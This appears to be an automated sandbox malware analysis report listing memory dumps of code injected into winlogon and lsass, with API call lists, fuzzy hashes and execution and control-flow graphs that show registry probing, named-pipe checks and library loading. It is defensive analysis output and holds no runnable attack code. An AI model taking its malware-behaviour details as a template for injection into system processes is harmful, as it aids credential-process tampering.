                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                            • String ID: csm
                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                            • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                            • Instruction ID: 6af6caf33eed429f26f2400f1c1a474b57e550817839aeb2e9cd6687076bf096
                                                                                                                            • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                            • Instruction Fuzzy Hash: 82113032214B8082EB618F25F844359B7E5FB88B94F584222DECC07768DF3DC951C700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323124982.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d016580000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __std_exception_copy
                                                                                                                            • String ID: ierarchy Descriptor'$riptor at (
                                                                                                                            • API String ID: 592178966-758928094
                                                                                                                            • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                            • Instruction ID: a87dbb86b00b2b98d5e7ae00f565f44d8c78c7afccc986630b2b213103a98e21
                                                                                                                            • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                            • Instruction Fuzzy Hash: D9E086A1640B84D0EF018F62EC8439833A4DB58B68FC89123DD5C47321FA38D5F9C300
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3324038371.000002D016610000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016610000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d016610000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __std_exception_copy
                                                                                                                            • String ID: ierarchy Descriptor'$riptor at (
                                                                                                                            • API String ID: 592178966-758928094
                                                                                                                            • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                            • Instruction ID: 71643649e3df945b7771ad6b681f5c6f87c53ee6b15a755d2a1ebe7c3169b504
                                                                                                                            • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                            • Instruction Fuzzy Hash: 4AE086A1A40BC490DF118F62EC943D833A0DB98B64F889127995C46321FA38D5F9C300
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323124982.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d016580000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __std_exception_copy
                                                                                                                            • String ID: Locator'$riptor at (
                                                                                                                            • API String ID: 592178966-4215709766
                                                                                                                            • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                            • Instruction ID: dffd4c35c552f18d438efc623f6b9ab54137c7cb9bea290096256bc086aaf240
                                                                                                                            • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                            • Instruction Fuzzy Hash: AFE086A1600B84C0EF018F61E8802987364E758B58FC89123CA4C47321EA38D5E5C300
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3324038371.000002D016610000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016610000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d016610000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __std_exception_copy
                                                                                                                            • String ID: Locator'$riptor at (
                                                                                                                            • API String ID: 592178966-4215709766
                                                                                                                            • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                            • Instruction ID: 04c75bb0b34fd079b1bbe548939fd58f6fcd3b84cb374ce53461770f431333a2
                                                                                                                            • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                            • Instruction Fuzzy Hash: 5DE086A1A00B8480DF118F61D8942987360E758B64FC89127C94C46321EA38D5E5C300
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 756756679-0
                                                                                                                            • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                            • Instruction ID: 6801c8294921cadce8a74c671636f0fe5ff9b85a627fac1833d6bc37b2bfe6e2
                                                                                                                            • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                            • Instruction Fuzzy Hash: 7F118F25701B8481EF54DBA6E888769B3A1FB89FC1F98406ADE4D87775DE39D942C300
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1617791916-0
                                                                                                                            • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                            • Instruction ID: 68d956744345cf7861370da0470b2e65133afa0ec658b7fe96f4140d664497f0
                                                                                                                            • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                            • Instruction Fuzzy Hash: 57E06535A01A5486EB088FA2DC4C74A36E1FB89F06F88C024C90D07361DF7EC899CBA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001A.00000002.2172600422.00007FF656991000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF656990000, based on PE: true
                                                                                                                            • Associated: 0000001A.00000002.2172554878.00007FF656990000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 0000001A.00000002.2172659176.00007FF656996000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 0000001A.00000002.2182892059.00007FF656F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 0000001A.00000002.2182932769.00007FF656F36000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 0000001A.00000002.2182976064.00007FF656F3B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 0000001A.00000002.2183018870.00007FF656F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_26_2_7ff656990000_updater.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7c2445de3022a9d17434f7f8fda6e2b2b0e499a135514e3e3fd989fa08777e8a
                                                                                                                            • Instruction ID: ba45a6bffb026c0d2546fa5f3ee40fa2507454c76d2af83e848f9c4c8aed9231
                                                                                                                            • Opcode Fuzzy Hash: 7c2445de3022a9d17434f7f8fda6e2b2b0e499a135514e3e3fd989fa08777e8a
                                                                                                                            • Instruction Fuzzy Hash: 18B01271F046468CE7046F06D84125C32207B16700F440430C40C63357CE7E9041C731

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:0.7%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:94
                                                                                                                            Total number of Limit Nodes:11
                                                                                                                            execution_graph 22873 2d6f151202c 22874 2d6f151205d 22873->22874 22875 2d6f1512081 22874->22875 22876 2d6f1512173 22874->22876 22883 2d6f151213e 22874->22883 22880 2d6f15120b9 StrCmpNIW 22875->22880 22875->22883 22884 2d6f1511bf4 5 API calls __std_exception_copy 22875->22884 22877 2d6f15121e7 22876->22877 22878 2d6f1512178 22876->22878 22877->22883 22886 2d6f1512f04 9 API calls __std_exception_copy 22877->22886 22885 2d6f1512f04 9 API calls __std_exception_copy 22878->22885 22880->22875 22884->22875 22885->22883 22886->22883 22887 2d6f151253c 22889 2d6f15125bb 22887->22889 22888 2d6f15127aa 22889->22888 22890 2d6f151261d GetFileType 22889->22890 22891 2d6f151262b StrCpyW 22890->22891 22892 2d6f1512641 22890->22892 22893 2d6f1512650 22891->22893 22903 2d6f1511a40 GetFinalPathNameByHandleW 22892->22903 22897 2d6f151265a 22893->22897 22901 2d6f15126ff 22893->22901 22896 2d6f1513844 StrCmpNIW 22896->22901 22897->22888 22908 2d6f1513844 22897->22908 22911 2d6f1513044 StrCmpIW StrCpyW StrCatW PathCombineW 22897->22911 22912 2d6f1511cac StrCmpIW StrCmpW 22897->22912 22901->22888 22901->22896 22913 2d6f1513044 StrCmpIW StrCpyW StrCatW PathCombineW 22901->22913 22914 2d6f1511cac StrCmpIW StrCmpW 22901->22914 22904 2d6f1511aa9 22903->22904 22905 2d6f1511a6a StrCmpNIW 22903->22905 22904->22893 22905->22904 22906 2d6f1511a84 lstrlenW 22905->22906 22906->22904 22907 2d6f1511a96 StrCpyW 22906->22907 22907->22904 22909 2d6f1513851 StrCmpNIW 22908->22909 22910 2d6f1513866 22908->22910 22909->22910 22910->22897 22911->22897 22912->22897 22913->22901 22914->22901 22915 2d6f1511abc 22920 2d6f1511628 GetProcessHeap 22915->22920 22917 2d6f1511acb 22918 2d6f1511ad2 Sleep SleepEx 22917->22918 22919 2d6f1511598 StrCmpIW StrCmpW 22917->22919 22918->22917 22919->22917 22921 2d6f1511648 __std_exception_copy 22920->22921 22965 2d6f1511268 GetProcessHeap 22921->22965 22923 2d6f1511650 22924 2d6f1511268 2 API calls 22923->22924 22925 2d6f1511661 22924->22925 22926 2d6f1511268 2 API calls 22925->22926 22927 2d6f151166a 22926->22927 22928 2d6f1511268 2 API calls 22927->22928 22929 2d6f1511673 22928->22929 22930 2d6f151168e RegOpenKeyExW 22929->22930 22931 2d6f15118a6 22930->22931 22932 2d6f15116c0 RegOpenKeyExW 22930->22932 22931->22917 22933 2d6f15116e9 22932->22933 22934 2d6f15116ff RegOpenKeyExW 22932->22934 22969 2d6f15112bc 13 API calls __std_exception_copy 22933->22969 22935 2d6f151173a RegOpenKeyExW 22934->22935 22936 2d6f1511723 22934->22936 22939 2d6f151175e 22935->22939 22940 2d6f1511775 RegOpenKeyExW 22935->22940 22970 2d6f151104c 5 API calls __std_exception_copy 22936->22970 22971 2d6f15112bc 13 API calls __std_exception_copy 22939->22971 22944 2d6f1511799 22940->22944 22945 2d6f15117b0 RegOpenKeyExW 22940->22945 22941 2d6f15116f5 RegCloseKey 22941->22934 22942 2d6f1511730 RegCloseKey 22942->22935 22972 2d6f15112bc 13 API calls __std_exception_copy 22944->22972 22948 2d6f15117eb RegOpenKeyExW 22945->22948 22949 2d6f15117d4 22945->22949 22946 2d6f151176b RegCloseKey 22946->22940 22950 2d6f1511826 RegOpenKeyExW 22948->22950 22951 2d6f151180f 22948->22951 22973 2d6f15112bc 13 API calls __std_exception_copy 22949->22973 22955 2d6f151184a 22950->22955 22956 2d6f1511861 RegOpenKeyExW 22950->22956 22974 2d6f151104c 5 API calls __std_exception_copy 22951->22974 22952 2d6f15117a6 RegCloseKey 22952->22945 22975 2d6f151104c 5 API calls __std_exception_copy 22955->22975 22960 2d6f151189c RegCloseKey 22956->22960 22961 2d6f1511885 22956->22961 22957 2d6f15117e1 RegCloseKey 22957->22948 22958 2d6f151181c RegCloseKey 22958->22950 22960->22931 22976 2d6f151104c 5 API calls __std_exception_copy 22961->22976 22962 2d6f1511857 RegCloseKey 22962->22956 22964 2d6f1511892 RegCloseKey 22964->22960 22977 2d6f1526168 22965->22977 22967 2d6f1511283 GetProcessHeap 22968 2d6f15112ae __std_exception_copy 22967->22968 22968->22923 22969->22941 22970->22942 22971->22946 22972->22952 22973->22957 22974->22958 22975->22962 22976->22964 22978 2d6f1526177 22977->22978 22978->22978 22979 2d6f14e273c 22981 2d6f14e276a 22979->22981 22980 2d6f14e2858 LoadLibraryA 22980->22981 22981->22980 22982 2d6f14e28d4 22981->22982 22983 2d6f157d6cc 22986 2d6f157d6dd __free_lconv_mon 22983->22986 22985 2d6f157d72c 22986->22985 22987 2d6f157d6ac 5 API calls __free_lconv_mon 22986->22987 22987->22985

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 5 2d6f151253c-2d6f15125c0 call 2d6f1532cc0 8 2d6f15125c6-2d6f15125c9 5->8 9 2d6f15127d8-2d6f15127fb 5->9 8->9 10 2d6f15125cf-2d6f15125dd 8->10 10->9 11 2d6f15125e3-2d6f1512629 call 2d6f1518c60 * 3 GetFileType 10->11 18 2d6f151262b-2d6f151263f StrCpyW 11->18 19 2d6f1512641-2d6f151264b call 2d6f1511a40 11->19 20 2d6f1512650-2d6f1512654 18->20 19->20 22 2d6f151265a-2d6f1512673 call 2d6f15130a8 call 2d6f1513844 20->22 23 2d6f15126ff-2d6f1512704 20->23 35 2d6f15126aa-2d6f15126f4 call 2d6f1532cc0 22->35 36 2d6f1512675-2d6f15126a4 call 2d6f15130a8 call 2d6f1513044 call 2d6f1511cac 22->36 25 2d6f1512707-2d6f151270c 23->25 27 2d6f1512729 25->27 28 2d6f151270e-2d6f1512711 25->28 31 2d6f151272c-2d6f1512745 call 2d6f15130a8 call 2d6f1513844 27->31 28->27 30 2d6f1512713-2d6f1512716 28->30 30->27 33 2d6f1512718-2d6f151271b 30->33 46 2d6f1512787-2d6f1512789 31->46 47 2d6f1512747-2d6f1512776 call 2d6f15130a8 call 2d6f1513044 call 2d6f1511cac 31->47 33->27 37 2d6f151271d-2d6f1512720 33->37 35->9 48 2d6f15126fa 35->48 36->9 36->35 37->27 41 2d6f1512722-2d6f1512727 37->41 41->27 41->31 51 2d6f151278b-2d6f15127a5 46->51 52 2d6f15127aa-2d6f15127ad 46->52 47->46 69 2d6f1512778-2d6f1512783 47->69 48->22 51->25 55 2d6f15127b7-2d6f15127ba 52->55 56 2d6f15127af-2d6f15127b5 52->56 59 2d6f15127bc-2d6f15127bf 55->59 60 2d6f15127d5 55->60 56->9 59->60 63 2d6f15127c1-2d6f15127c4 59->63 60->9 63->60 64 2d6f15127c6-2d6f15127c9 63->64 64->60 66 2d6f15127cb-2d6f15127ce 64->66 66->60 68 2d6f15127d0-2d6f15127d3 66->68 68->9 68->60 69->9 70 2d6f1512785 69->70 70->25
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileType
                                                                                                                            • String ID: \\.\pipe\
                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                            • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                            • Instruction ID: fa04f75c9475a18510419c108b79fce0653dad0fa003f1e7f796e61fbc6322b7
                                                                                                                            • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                            • Instruction Fuzzy Hash: A07170A6200F858AE6669F25B85C3AA6794F3857D4F64002BDD0F67F89DF39CE458700

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 71 2d6f151202c-2d6f1512057 call 2d6f1532d00 73 2d6f151205d-2d6f1512066 71->73 74 2d6f1512068-2d6f151206c 73->74 75 2d6f151206f-2d6f1512072 73->75 74->75 76 2d6f1512078-2d6f151207b 75->76 77 2d6f1512223-2d6f1512243 75->77 78 2d6f1512081-2d6f1512093 76->78 79 2d6f1512173-2d6f1512176 76->79 78->77 80 2d6f1512099-2d6f15120a5 78->80 81 2d6f15121e7-2d6f15121ea 79->81 82 2d6f1512178-2d6f1512192 call 2d6f1512f04 79->82 83 2d6f15120a7-2d6f15120b7 80->83 84 2d6f15120d3-2d6f15120de call 2d6f1511bbc 80->84 81->77 85 2d6f15121ec-2d6f15121ff call 2d6f1512f04 81->85 82->77 91 2d6f1512198-2d6f15121ae 82->91 83->84 88 2d6f15120b9-2d6f15120d1 StrCmpNIW 83->88 92 2d6f15120ff-2d6f1512111 84->92 97 2d6f15120e0-2d6f15120f8 call 2d6f1511bf4 84->97 85->77 96 2d6f1512201-2d6f1512209 85->96 88->84 88->92 91->77 95 2d6f15121b0-2d6f15121cc 91->95 98 2d6f1512121-2d6f1512123 92->98 99 2d6f1512113-2d6f1512115 92->99 102 2d6f15121d0-2d6f15121e3 95->102 96->77 105 2d6f151220b-2d6f1512213 96->105 97->92 113 2d6f15120fa-2d6f15120fd 97->113 103 2d6f151212a 98->103 104 2d6f1512125-2d6f1512128 98->104 100 2d6f1512117-2d6f151211a 99->100 101 2d6f151211c-2d6f151211f 99->101 107 2d6f151212d-2d6f1512130 100->107 101->107 102->102 108 2d6f15121e5 102->108 103->107 104->107 109 2d6f1512216-2d6f1512221 105->109 111 2d6f151213e-2d6f1512141 107->111 112 2d6f1512132-2d6f1512138 107->112 108->77 109->77 109->109 111->77 114 2d6f1512147-2d6f151214b 111->114 112->80 112->111 113->107 115 2d6f151214d-2d6f1512150 114->115 116 2d6f1512162-2d6f151216e 114->116 115->77 117 2d6f1512156-2d6f151215b 115->117 116->77 117->114 118 2d6f151215d 117->118 118->77
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                            • String ID: S$dialer
                                                                                                                            • API String ID: 756756679-3873981283
                                                                                                                            • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                                                                            • Instruction ID: 7a83d85bf80e11694d2d7db4162bf47d6d0c4d20143003a03d639ac9e943c438
                                                                                                                            • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                                                                            • Instruction Fuzzy Hash: 6D518BB6A10E248AEB62CF26F84C6AD63A5F7047C4F25951ADE1E22E85DB39CC51C740

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FinalHandleNamePathlstrlen
                                                                                                                            • String ID: \\?\
                                                                                                                            • API String ID: 2719912262-4282027825
                                                                                                                            • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                            • Instruction ID: 1a29fbed29bbccc1987992930e6102033b0a423cd1e4e3151e2afb20eff6506f
                                                                                                                            • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                            • Instruction Fuzzy Hash: 14F03CA3304A8196EB608F21F8DC75967A0F758BC8F944022DA4E46D58DB7CCE8DCB00

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1683269324-0
                                                                                                                            • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                            • Instruction ID: 25535357102f4341e1be78c6643d6b7c1b19e4a9101efaa7cc3453e24cb777c9
                                                                                                                            • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                            • Instruction Fuzzy Hash: 7811C0F1610E808EFBA2AF61F86D75922A4A7543E4F40412B990F92E90EF7CCC48C204

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 000002D6F1511628: GetProcessHeap.KERNEL32 ref: 000002D6F1511633
                                                                                                                              • Part of subcall function 000002D6F1511628: HeapAlloc.KERNEL32 ref: 000002D6F1511642
                                                                                                                              • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F15116B2
                                                                                                                              • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F15116DF
                                                                                                                              • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F15116F9
                                                                                                                              • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F1511719
                                                                                                                              • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F1511734
                                                                                                                              • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F1511754
                                                                                                                              • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F151176F
                                                                                                                              • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F151178F
                                                                                                                              • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F15117AA
                                                                                                                              • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F15117CA
                                                                                                                            • Sleep.KERNEL32 ref: 000002D6F1511AD7
                                                                                                                            • SleepEx.KERNELBASE ref: 000002D6F1511ADD
                                                                                                                              • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F15117E5
                                                                                                                              • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F1511805
                                                                                                                              • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F1511820
                                                                                                                              • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F1511840
                                                                                                                              • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F151185B
                                                                                                                              • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F151187B
                                                                                                                              • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F1511896
                                                                                                                              • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F15118A0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1534210851-0
                                                                                                                            • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                            • Instruction ID: fabcacca4273e522b4c4af737a3624ee53845b919a9d6f50b07f832e41c12ee0
                                                                                                                            • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                            • Instruction Fuzzy Hash: 4A31BDE1210E4599EF529F36F6CD3A923A5BB44BD0F0854679E0FA7E95EE1CCC51C210

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 176 2d6f14e273c-2d6f14e27a4 call 2d6f14e29d4 * 4 185 2d6f14e29b2 176->185 186 2d6f14e27aa-2d6f14e27ad 176->186 188 2d6f14e29b4-2d6f14e29d0 185->188 186->185 187 2d6f14e27b3-2d6f14e27b6 186->187 187->185 189 2d6f14e27bc-2d6f14e27bf 187->189 189->185 190 2d6f14e27c5-2d6f14e27e6 189->190 190->185 192 2d6f14e27ec-2d6f14e280c 190->192 193 2d6f14e280e-2d6f14e2836 192->193 194 2d6f14e2838-2d6f14e283f 192->194 193->193 193->194 195 2d6f14e2845-2d6f14e2852 194->195 196 2d6f14e28df-2d6f14e28e6 194->196 195->196 199 2d6f14e2858-2d6f14e286a LoadLibraryA 195->199 197 2d6f14e2992-2d6f14e29b0 196->197 198 2d6f14e28ec-2d6f14e2901 196->198 197->188 198->197 200 2d6f14e2907 198->200 201 2d6f14e286c-2d6f14e2878 199->201 202 2d6f14e28ca-2d6f14e28d2 199->202 205 2d6f14e290d-2d6f14e2921 200->205 206 2d6f14e28c5-2d6f14e28c8 201->206 202->199 203 2d6f14e28d4-2d6f14e28d9 202->203 203->196 208 2d6f14e2982-2d6f14e298c 205->208 209 2d6f14e2923-2d6f14e2934 205->209 206->202 207 2d6f14e287a-2d6f14e287d 206->207 213 2d6f14e287f-2d6f14e28a5 207->213 214 2d6f14e28a7-2d6f14e28b7 207->214 208->197 208->205 211 2d6f14e293f-2d6f14e2943 209->211 212 2d6f14e2936-2d6f14e293d 209->212 216 2d6f14e2945-2d6f14e294b 211->216 217 2d6f14e294d-2d6f14e2951 211->217 215 2d6f14e2970-2d6f14e2980 212->215 218 2d6f14e28ba-2d6f14e28c1 213->218 214->218 215->208 215->209 216->215 220 2d6f14e2963-2d6f14e2967 217->220 221 2d6f14e2953-2d6f14e2961 217->221 218->206 220->215 222 2d6f14e2969-2d6f14e296c 220->222 221->215 222->215
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331385456.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f14e0000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1029625771-0
                                                                                                                            • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                            • Instruction ID: 2a527126fa6660018da58d358d37c763bfb819c27c69be159df49911753554d9
                                                                                                                            • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                            • Instruction Fuzzy Hash: BB61D472B01A908BDB54CF15A44CB2D7392FB94BE4F58912ADE5A07B8CDA3CDD52C700

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4292702814-0
                                                                                                                            • Opcode ID: dd9fd347fe8d251c64e9f03e0b9c8ce045e185238ab486bcf6df9ff2ab176017
                                                                                                                            • Instruction ID: 8d65d80c47894129daed010ab02c0d2d8836aa8ea5412bcfd2d6647ab8bdc98c
                                                                                                                            • Opcode Fuzzy Hash: dd9fd347fe8d251c64e9f03e0b9c8ce045e185238ab486bcf6df9ff2ab176017
